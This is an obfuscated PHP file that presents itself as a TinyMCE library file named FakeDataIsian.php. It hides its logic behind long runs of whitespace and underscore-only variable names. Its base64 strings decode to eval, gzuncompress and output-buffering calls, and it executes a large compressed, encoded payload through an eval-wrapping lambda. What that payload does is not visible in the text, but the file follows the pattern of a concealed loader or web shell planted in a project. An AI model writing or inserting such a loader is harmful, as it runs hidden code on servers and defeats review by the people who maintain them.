<?php 
        $__='printf';$_='Loading app/Libraries/TinyMCE/FakeDataIsian.php';
        































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































































































                                                                                                                                                                                                                     $________;
